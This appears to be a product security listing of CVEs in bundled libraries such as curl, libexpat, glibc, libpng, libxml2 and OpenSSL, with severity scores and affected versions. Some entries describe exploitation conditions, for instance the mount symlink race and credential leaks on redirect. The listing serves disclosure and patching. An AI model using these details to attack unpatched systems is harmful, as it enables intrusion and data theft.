    CVE-2022-25235xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context.HIGH

    NVD: 9.8

    RedHat: 9.8

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-25236xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.HIGH

    NVD: 9.8

    RedHat: 9.8

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-24407In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL INSERT or UPDATE statement.HIGH

    NVD: 8.8

    RedHat: 8.8

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-0155follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized ActorHIGH

    NVD: 6.5

    RedHat: 6.5

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-0235node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized ActorHIGH

    NVD: 6.1

    RedHat: 6.1

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-23647Prism is a syntax highlighting library. Starting with version 1.14.0 and prior to version 1.27.0, Prism's command line plugin can be used by attackers to achieve a cross-site scripting attack. The command line plugin did not properly escape its output, leading to the input text being inserted into the DOM as HTML code. Server-side usage of Prism is not impacted. Websites that do not use the Command Line plugin are also not impacted. This bug has been fixed in v1.27.0. As a workaround, do not use the command line plugin on untrusted inputs, or sanitize all code blocks (remove all HTML code text) from all code blocks that use the command line plugin.HIGH

    NVD: 6.1

    RedHat: 6.1

    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-5278A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.MEDIUM

    NVD: n/a

    RedHat: 4.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-13034When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey` with the curl tool,curl should check the public key of the server certificate to verify the peer. This check was skipped in a certain condition that would then make curl allow the connection without performing the proper check, thus not noticing a possible impostor. To skip this check, the connection had to be done with QUIC with ngtcp2 built to use GnuTLS and the user had to explicitly disable the standard certificate verification.MEDIUM

    NVD: n/a

    RedHat: 6.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-14017When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore possibly also affect other concurrently setup transfers. Disabling certificate verification for a specific transfer could unintentionally disable the feature for other threads as well.MEDIUM

    NVD: n/a

    RedHat: 4.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.18.2
    • 8.18.1
    CVE-2026-1965libcurl can in some circumstances reuse the wrong connection when asked to do an Negotiate-authenticated HTTP or HTTPS request. libcurl features a pool of recent connections so that subsequent requests can reuse an existing connection to avoid overhead. When reusing a connection a range of criterion must first be met. Due to a logical error in the code, a request that was issued by an application could wrongfully reuse an existing connection to the same server that was authenticated using different credentials. One underlying reason being that Negotiate sometimes authenticates *connections* and not *requests*, contrary to how HTTP is designed to work. An application that allows Negotiate authentication to a server (that responds wanting Negotiate) with `user1:password1` and then does another operation to the same server also using Negotiate but with `user2:password2` (while the previous connection is still alive) - the second request wrongly reused the same connection and since it then sees that the Negotiate negotiation is already made, it just sends the request over that connection thinking it uses the user2 credentials when it is in fact still using the connection authenticated for user1... The set of authentication methods to use is set with `CURLOPT_HTTPAUTH`. Applications can disable libcurl's reuse of connections and thus mitigate this problem, by using one of the following libcurl options to alter how connections are or are not reused: `CURLOPT_FRESH_CONNECT`, `CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the curl_multi API).MEDIUM

    NVD: n/a

    RedHat: 6.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.18.2
    • 8.18.1
    CVE-2026-3783When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.MEDIUM

    NVD: n/a

    RedHat: 5.7

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.18.2
    • 8.18.1
    CVE-2026-3784curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a server, even if the new request uses different credentials for the HTTP proxy. The proper behavior is to create or use a separate connection.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.18.2
    • 8.18.1
    CVE-2026-3805When doing a second SMB request to the same host again, curl would wrongly use a data pointer pointing into already freed memory.MEDIUM

    NVD: n/a

    RedHat: 6.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-4873A flaw was found in curl. A remote attacker could exploit this by initiating an unencrypted connection (via IMAP, SMTP, or POP3) and then making a subsequent request to the same host that requires Transport Layer Security (TLS). Due to incorrect connection reuse, the subsequent request would bypass the TLS requirement, leading to the transmission of sensitive information in cleartext. This vulnerability, categorized as Cleartext Transmission of Sensitive Information (CWE-319), results in information disclosure.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-5545A flaw was found in libcurl. An application using libcurl that performs an authenticated HTTP(S) request after a Negotiate-authenticated one to the same host may incorrectly reuse the previous connection. This authentication bypass vulnerability allows the second request to be sent over a connection authenticated with different credentials, potentially leading to unauthorized access or information disclosure.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-5773A flaw was found in libcurl. Due to a logical error in the connection reuse mechanism for SMB (Server Message Block) transfers, libcurl might reuse an existing SMB connection with a different share than intended. This vulnerability, categorized as CWE-488 (Exposure of Data Element to Wrong Session), could lead to the download of an incorrect file or the upload of a file to an unintended location when an application uses libcurl for SMB transfers.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-6253A flaw was found in curl. When curl is configured to use distinct proxies for different URL schemes, a redirect from a URL using an authenticated proxy to one using an unauthenticated proxy can inadvertently expose the initial proxy's credentials. This improper credential management (CWE-522) may allow an attacker to gain unauthorized access or information by intercepting these disclosed credentials.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-6429A flaw was found in libcurl. When configured to use a .netrc file for credentials and follow HTTP redirects, libcurl can inadvertently send the password from the initial connection to the redirected host. This sensitive information disclosure occurs when both the original and redirect URLs use clear text HTTP, are performed over the same HTTP proxy, and the same connection is reused. This vulnerability, categorized as an Exposure of Sensitive Information to an Unauthorized Actor (CWE-200), could allow an attacker to obtain user credentials.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-32776libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.MEDIUM

    NVD: 5.5

    RedHat: 6.2

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-32777libexpat before 2.7.5 allows an infinite loop while parsing DTD content.MEDIUM

    NVD: 5.5

    RedHat: 4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-32778libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.MEDIUM

    NVD: 5.5

    RedHat: 5.1

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-23865An integer overflow in the tt_var_load_item_variation_store function of the Freetype library in versions 2.13.2 and 2.13.3 may allow for an out of bounds read operation when parsing HVAR/VVAR/MVAR tables in OpenType variable fonts. This issue is fixed in version 2.14.2.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.18.2
    • 8.18.1
    CVE-2025-14087A flaw was found in GLib (Gnome Lib). This vulnerability allows a remote attacker to cause heap corruption, leading to a denial of service or potential code execution via a buffer-underflow in the GVariant parser when processing maliciously crafted input strings.MEDIUM

    NVD: 9.8

    RedHat: 5.6

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-14512A flaw was found in glib. This vulnerability allows a heap buffer overflow and denial-of-service (DoS) via an integer overflow in GLib's GIO (GLib Input/Output) escape_byte_string() function when processing malicious file or remote filesystem attribute values.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-1484A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.MEDIUM

    NVD: n/a

    RedHat: 4.2

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-1489A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.MEDIUM

    NVD: n/a

    RedHat: 5.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-4046The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application. This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-4437Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-5435The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-5450Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.MEDIUM

    NVD: n/a

    RedHat: 5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-5928Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash. A bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.MEDIUM

    NVD: n/a

    RedHat: 5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-68972In GnuPG through 2.4.8, if a signed message has \f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an "invalid armor" message is printed during verification). This is related to use of \f as a marker to denote truncation of a long plaintext line.MEDIUM

    NVD: 4.7

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-3833A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-22693HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-40355In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2023-30571Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.MEDIUM

    NVD: 5.3

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-60753An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).MEDIUM

    NVD: n/a

    RedHat: 5.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-4426A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.MEDIUM

    NVD: n/a

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-5745A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare "d" or "default" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).MEDIUM

    NVD: n/a

    RedHat: 5.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-27456util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.MEDIUM

    NVD: n/a

    RedHat: 4.7

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    • 8.17.6
    CVE-2026-41989Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.MEDIUM

    NVD: n/a

    RedHat: 7.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-28164Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.MEDIUM

    NVD: n/a

    RedHat: 5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.18.2
    CVE-2025-64505LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.MEDIUM

    NVD: n/a

    RedHat: 4.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-64506LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.MEDIUM

    NVD: n/a

    RedHat: 6.1

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-33416LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr->trans_alpha = info_ptr->trans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr->palette = png_ptr->palette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue.MEDIUM

    NVD: n/a

    RedHat: 7.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-33636LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng's ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue.MEDIUM

    NVD: n/a

    RedHat: 7.6

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-34757LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57.MEDIUM

    NVD: n/a

    RedHat: 4.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-0990A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-1757A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.MEDIUM

    NVD: n/a

    RedHat: 6.2

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-6732A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.MEDIUM

    NVD: 7.5

    RedHat: 6.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-22185OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.MEDIUM

    NVD: n/a

    RedHat: 6.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-31790Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    CVE-2026-28386Issue summary: Applications using AES-CFB128 encryption or decryption on systems with AVX-512 and VAES support can trigger an out-of-bounds read of up to 15 bytes when processing partial cipher blocks. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not written to output. The vulnerable code path is only reached when processing partial blocks (when a previous call left an incomplete block and the current call provides fewer bytes than needed to complete it). Additionally, the input buffer must be positioned at a page boundary with the following page unmapped. CFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons the issue was assessed as Low severity according to our Security Policy. Only x86-64 systems with AVX-512 and VAES instruction support are affected. Other architectures and systems without VAES support use different code paths that are not affected. OpenSSL FIPS module in 3.6 version is affected by this issue.MEDIUM

    NVD: 7.5

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
